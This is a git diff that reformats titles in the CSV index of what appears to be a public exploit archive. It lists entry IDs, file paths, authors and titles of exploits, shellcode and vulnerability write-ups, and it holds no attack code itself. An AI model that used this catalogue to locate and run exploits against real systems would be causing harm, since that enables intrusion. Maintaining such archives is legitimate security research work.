diff --git a/files.csv b/files.csv
index 9fc4c9e81..75cb4e1a2 100755
--- a/files.csv
+++ b/files.csv
@@ -1630,7 +1630,7 @@ id,file,description,date,author,platform,type,port
 1919,platforms/php/webapps/1919.txt,"CMS Faethon <= 1.3.2 (mainpath) Remote File Inclusion Vulnerability",2006-06-16,K-159,php,webapps,0
 1920,platforms/php/webapps/1920.php,"Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
 1921,platforms/php/webapps/1921.pl,"FlashBB <= 1.1.8 (phpbb_root_path) Remote File Include Exploit",2006-06-17,h4ntu,php,webapps,0
-1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
+1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability",2006-06-17,Basti,php,webapps,0
 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure",2006-06-18,php0t,multiple,local,0
 1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0
@@ -12872,7 +12872,7 @@ id,file,description,date,author,platform,type,port
 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta - Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0
 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0
 14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0
-14706,platforms/windows/local/14706.py,"Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
+14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0
 14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0
 14712,platforms/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0
@@ -13858,7 +13858,7 @@ id,file,description,date,author,platform,type,port
 15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0
 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0
 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0
-16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
+16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
 16001,platforms/php/webapps/16001.txt,"People Joomla Component 1.0.0 - Local File Inclusion Vulnerability",2011-01-16,"ALTBTA ",php,webapps,0
 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0
@@ -14833,7 +14833,7 @@ id,file,description,date,author,platform,type,port
 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69
 17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
 17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0
-17048,platforms/windows/remote/17048.rb,"VLC AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
+17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
 17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0
 17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0
 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0
@@ -21506,7 +21506,7 @@ id,file,description,date,author,platform,type,port
 24318,platforms/windows/shellcode/24318.c,"Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
 24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0
 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0
-24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
+24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
 24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0
 24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0
 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0
@@ -26934,7 +26934,7 @@ id,file,description,date,author,platform,type,port
 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0
 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0
-29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
+29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal Vulnerability",2007-04-11,Dr.RoVeR,php,webapps,0
 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass Vulnerability",2007-04-11,"Jon Oberheide",cgi,webapps,0
 29843,platforms/windows/remote/29843.txt,"webMethods Glue <= 6.5.1 Console Directory Traversal Vulnerability",2007-04-11,"Patrick Webster",windows,remote,0
@@ -32579,7 +32579,7 @@ id,file,description,date,author,platform,type,port
 36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
 36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0
-36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
+36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
 36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0
 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80
 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
@@ -32631,7 +32631,7 @@ id,file,description,date,author,platform,type,port
 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
 36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
-36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
+36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
 36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
@@ -32756,7 +32756,7 @@ id,file,description,date,author,platform,type,port
 36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0
 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0
 36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0
-36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
+36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
 36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
 36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
 36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
@@ -32829,7 +32829,7 @@ id,file,description,date,author,platform,type,port
 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0
 36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0
 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
-36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
+36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
 36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0
 36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0
 36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0
@@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port
 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0
 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0
-36747,platforms/linux/local/36747.c,"Fedora abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
+36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
 36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
@@ -33640,7 +33640,7 @@ id,file,description,date,author,platform,type,port
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
 37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
-37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
+37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
@@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port
 37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot (28 Bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
-37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
+37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
 37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
@@ -34307,7 +34307,7 @@ id,file,description,date,author,platform,type,port
 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
 37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
-38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
+38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
@@ -34557,7 +34557,7 @@ id,file,description,date,author,platform,type,port
 38272,platforms/windows/dos/38272.txt,"Windows Kernel - Brush Object Use-After-Free Vulnerability (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0
 38273,platforms/win32/dos/38273.txt,"Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
 38274,platforms/win32/dos/38274.txt,"Windows Kernel - NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
-38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
+38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win32,dos,0
 38276,platforms/win32/dos/38276.txt,"Windows Kernel - FlashWindowEx​ Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
 38277,platforms/win32/dos/38277.txt,"Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
 38278,platforms/win32/dos/38278.txt,"Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
@@ -34642,7 +34642,7 @@ id,file,description,date,author,platform,type,port
 38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0
 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0
-38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
+38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
 38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0
 38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0
@@ -34879,7 +34879,7 @@ id,file,description,date,author,platform,type,port
 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
 38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
 38612,platforms/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",android,dos,0
-38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
+38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
 38614,platforms/android/dos/38614.txt,"Samsung libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
 38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0
 38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use After Free",2015-11-03,"John Leitch",multiple,dos,0
@@ -35544,8 +35544,8 @@ id,file,description,date,author,platform,type,port
 39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
 39308,platforms/linux/dos/39308.c,"Linux Kernel <= 3.x / <= 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0
 39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin <=1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80
-39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
-39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
+39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
+39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
 39312,platforms/lin_x86-64/shellcode/39312.c,"x86_64 Linux xor/not/div Encoded execve Shellcode",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
 39313,platforms/php/webapps/39313.txt,"Food Order Portal 'admin_user_delete.php' Cross Site Request Forgery Vulnerability",2014-09-12,KnocKout,php,webapps,0
 39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
@@ -35660,7 +35660,7 @@ id,file,description,date,author,platform,type,port
 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0
 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
-39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)",2016-02-10,koczkatamas,windows,local,0
+39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
 39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure Vulnerability",2016-02-10,Vulnerability-Lab,multiple,webapps,0
 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80
@@ -35736,7 +35736,7 @@ id,file,description,date,author,platform,type,port
 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
 39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80
-39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
+39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
 39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69
 39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080
 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
@@ -35789,7 +35789,7 @@ id,file,description,date,author,platform,type,port
 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
 39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
 39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
-39574,platforms/windows/local/39574.cs,"Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
+39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
 39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
 39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
 39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
@@ -35810,7 +35810,7 @@ id,file,description,date,author,platform,type,port
 39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80
 39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
-39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
+39595,platforms/multiple/local/39595.txt,"OS X / iOS - Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80
 39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80
@@ -35910,7 +35910,7 @@ id,file,description,date,author,platform,type,port
 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
 39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80
-39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
+39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
 39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443
